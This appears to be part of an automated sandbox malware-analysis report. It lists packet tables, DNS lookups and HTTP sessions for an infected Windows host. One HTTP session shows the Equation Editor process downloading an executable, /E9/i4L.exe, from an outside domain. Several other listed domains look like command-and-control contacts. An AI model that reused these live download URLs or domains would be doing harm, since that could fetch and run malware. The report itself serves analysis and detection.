                                               Jan 14, 2022 16:04:36.064630985 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064646006 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064656973 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064711094 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.065083027 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.065138102 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.065174103 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.065182924 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.065238953 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.065263987 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.065325022 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.101618052 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.101684093 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.101718903 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.101737022 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.101748943 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.101754904 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.101772070 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.101780891 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248202085 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248265028 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248383999 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248436928 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248467922 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248492002 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248526096 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248541117 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248564959 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248634100 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248655081 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.248713970 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.248836040 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249326944 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249375105 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249403954 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249427080 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249447107 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249466896 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249478102 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249494076 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249509096 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249521971 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249561071 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249577999 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249593973 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249615908 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249628067 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249639034 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249677896 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249680042 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249690056 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249762058 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249779940 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249824047 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249845028 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249898911 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.249916077 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.249974966 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.265113115 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.287471056 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.287612915 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.287668943 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.287688971 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.287722111 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.287761927 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.287765980 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.287897110 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.287983894 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.288053036 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.288129091 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.288590908 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.432569981 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.432648897 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.432656050 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.432672977 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.432713985 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.432811975 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.432873011 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.432888985 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.432892084 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.432945967 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.433195114 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.433269024 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.433274031 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.433288097 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.433330059 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.433718920 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.433813095 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.433875084 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.433945894 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434010983 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.434338093 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434437990 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434472084 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.434484959 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434494019 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.434520006 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.434773922 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434839010 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.434870005 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.434947968 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.435249090 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.435309887 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.435323954 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.435380936 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.435676098 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.435748100 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.435750008 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.435762882 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.435803890 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.436230898 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.436317921 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.436326027 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.436342955 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.436388016 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.441907883 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471496105 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.471570969 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.471681118 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471705914 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.471729994 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471740961 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471770048 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471851110 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.471901894 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.471914053 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.471965075 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.472717047 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.617836952 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.617923021 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.618017912 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.618058920 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.618083000 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.618094921 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.618153095 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.618432999 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.620714903 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.620768070 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.620882034 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.620888948 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.620908022 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.620985031 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621057034 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621068001 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621084929 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621098042 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621129990 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621150017 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621157885 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621221066 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621268988 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621279955 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621298075 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621320963 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621325970 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.621361971 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.621411085 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.629693031 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.640779972 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.640815020 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:38.035305023 CET | 49167 | 80 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:05:43.605257988 CET | 49169 | 80 | 192.168.2.22 | 216.239.34.21
                                               Jan 14, 2022 16:05:43.622224092 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                               Jan 14, 2022 16:05:43.622328043 CET | 49169 | 80 | 192.168.2.22 | 216.239.34.21
                                               Jan 14, 2022 16:05:43.622512102 CET | 49169 | 80 | 192.168.2.22 | 216.239.34.21
                                               Jan 14, 2022 16:05:43.639312029 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                               Jan 14, 2022 16:05:43.705197096 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                               Jan 14, 2022 16:05:43.705229998 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                               Jan 14, 2022 16:05:43.705254078 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                               Jan 14, 2022 16:05:43.705276012 CET | 80 | 49169 | 216.239.34.21 | 192.168.2.22
                                              Jan 14, 2022 16:05:43.705297947 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705321074 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705343008 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705363989 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705384970 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705406904 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705429077 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.705467939 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.705574036 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724138975 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724184990 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724282026 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724307060 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724663973 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724688053 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724720955 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724736929 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:53.746768951 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:53.933163881 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:53.933317900 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:53.933439016 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.111656904 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:54.111696959 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:54.111931086 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.111978054 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.279328108 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:06:04.229212999 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.249311924 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.249404907 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.249555111 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.269602060 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365375996 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365398884 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365621090 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.365680933 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.384483099 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:09.673098087 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:12.678507090 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:18.685014009 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.047472954 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.047573090 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.047626972 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.415909052 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428003073 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428040028 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428190947 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.428250074 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.793454885 CET8049173118.67.131.217192.168.2.22

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jan 14, 2022 16:04:33.695847034 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:04:33.875735044 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                              Jan 14, 2022 16:05:43.551692963 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:05:43.590673923 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                              Jan 14, 2022 16:05:53.711869001 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:05:53.744340897 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
                                              Jan 14, 2022 16:05:59.160648108 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:05:59.182547092 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
                                              Jan 14, 2022 16:06:04.200428963 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:06:04.228068113 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22
                                              Jan 14, 2022 16:06:09.376717091 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
                                              Jan 14, 2022 16:06:09.671801090 CET | 53 | 55616 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Jan 14, 2022 16:04:33.695847034 CET | 192.168.2.22 | 8.8.8.8 | 0x5e41 | Standard query (0) | mikeloayza.com | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:43.551692963 CET | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.fisioletsgo.com | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:53.711869001 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.bitcointradel.com | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:59.160648108 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.freeadakahamazon.com | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:06:04.200428963 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.executive-air.net | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:06:09.376717091 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.luckyfandom.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Jan 14, 2022 16:04:33.875735044 CET | 8.8.8.8 | 192.168.2.22 | 0x5e41 | No error (0) | mikeloayza.com | | 131.153.37.4 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.32.21 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.fisioletsgo.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.bitcointradel.com | bitcointradel.com | | CNAME (Canonical name) | IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | bitcointradel.com | | 162.0.209.73 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:05:59.182547092 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | Name error (3) | www.freeadakahamazon.com | none | none | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.executive-air.net | executive-air.net | | CNAME (Canonical name) | IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | executive-air.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                              Jan 14, 2022 16:06:09.671801090 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.luckyfandom.com | | 118.67.131.217 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • mikeloayza.com
                                              • www.fisioletsgo.com
                                              • www.bitcointradel.com
                                              • www.executive-air.net
                                              • www.luckyfandom.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.22 | 49168 | 131.153.37.4 | 443 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp | kBytes transferred | Direction | Data


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.22 | 49167 | 131.153.37.4 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 14, 2022 16:04:34.101399899 CET | 0 | OUT | GET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: mikeloayza.com
                                              Connection: Keep-Alive
                                              Jan 14, 2022 16:04:34.291004896 CET | 1 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Fri, 14 Jan 2022 15:04:33 GMT
                                              Server: Apache
                                              Location: https://mikeloayza.com/E9/i4L.exe
                                              Content-Length: 241
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
